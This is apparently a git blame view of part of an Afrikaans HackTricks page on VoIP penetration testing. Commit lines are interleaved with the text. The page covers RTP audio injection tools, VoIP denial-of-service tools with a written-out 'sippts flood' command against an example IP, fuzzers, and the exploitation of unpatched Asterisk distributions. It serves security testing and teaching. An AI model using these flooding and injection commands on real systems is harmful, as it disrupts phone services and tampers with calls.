* **Verskeie vouers** sal aan die gecompromitteerde asterisk gebruiker behoort (as dit nie as root loop nie). Hierdie gebruiker kan die vorige lêers lees en beheer ook die konfigurasie, so hy kan Asterisk laat laai ander backdoored binaries wanneer dit uitgevoer word.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### RTP Inspuiting
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
Dit is moontlik om 'n **`.wav`** in gesprekke in te voeg met behulp van gereedskap soos **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) en **`rtpmixsound`** (`sudo apt install rtpmixsound`).
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Of jy kan die skripte van [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) gebruik om **gesprekke** te **skandeer** (**`rtpscan.pl`**), 'n `.wav` na 'n gesprek te stuur (**`rtpsend.pl`**) en **ruis** in 'n gesprek in te voeg (**`rtpflood.pl`**).
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
### DoS
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Daar is verskeie maniere om te probeer om DoS in VoIP bedieners te bereik.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS flood`** van [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood stuur onbeperkte boodskappe na die teiken.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
* `sippts flood -i 10.10.0.10 -m invite -v`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS ping`** van [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping maak 'n SIP ping om die bediener se reaksietyd te sien.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
* `sippts ping -i 10.10.0.10`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protokol wat deur Asterisk gebruik word.
* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): 'n Gereedskap om SIP/SDP INVITE boodskap flooding oor UDP/IP uit te voer.
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Stuur verskeie goed gevormde RTP pakkette. Dit is nodig om die RTP poorte wat gebruik word te ken (sniff eers).
* [**SIPp**](https://github.com/SIPp/sipp): Laat jou toe om SIP verkeer te analiseer en te genereer. Dit kan ook gebruik word om DoS te doen.
* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP switserse leërskêr. Kan ook gebruik word om SIP aanvalle uit te voer.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
* Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### OS Kw vulnerabilities
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Die maklikste manier om 'n sagteware soos Asterisk te installeer, is om 'n **OS verspreiding** af te laai wat dit reeds geïnstalleer het, soos: **FreePBX, Elastix, Trixbox**... Die probleem met hierdie is dat sodra dit werk, mag stelselsadministrateurs **dit nie weer opdateer nie** en **kw vulnerabilities** sal met tyd ontdek word.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Verwysings
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
* [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
* [https://github.com/EnableSecurity/sipvicious](https://github.com/EnableSecurity/sipvicious)
GITBOOK-3882: change request with no subject merged in GitBook
2023-04-23 19:27:30 +00:00
* [http://blog.pepelux.org/](http://blog.pepelux.org/)
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
* [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
a
2024-02-08 03:08:28 +00:00
* [https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% hint style="success" %}
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
**Kry 'n hacker se perspektief op jou webtoepassings, netwerk, en wolk**
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
**Vind en rapporteer kritieke, exploiteerbare kw vulnerabilities met werklike besigheidsimpak.** Gebruik ons 20+ pasgemaakte gereedskap om die aanvaloppervlak te karteer, sekuriteitskwessies te vind wat jou toelaat om bevoegdhede te verhoog, en gebruik geoutomatiseerde exploits om noodsaaklike bewyse te versamel, wat jou harde werk in oortuigende verslae omskakel.
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<details>
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
<summary>Ondersteun HackTricks</summary>
fix
2024-02-03 12:22:53 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% endhint %}
Reference in a new issue Copy permalink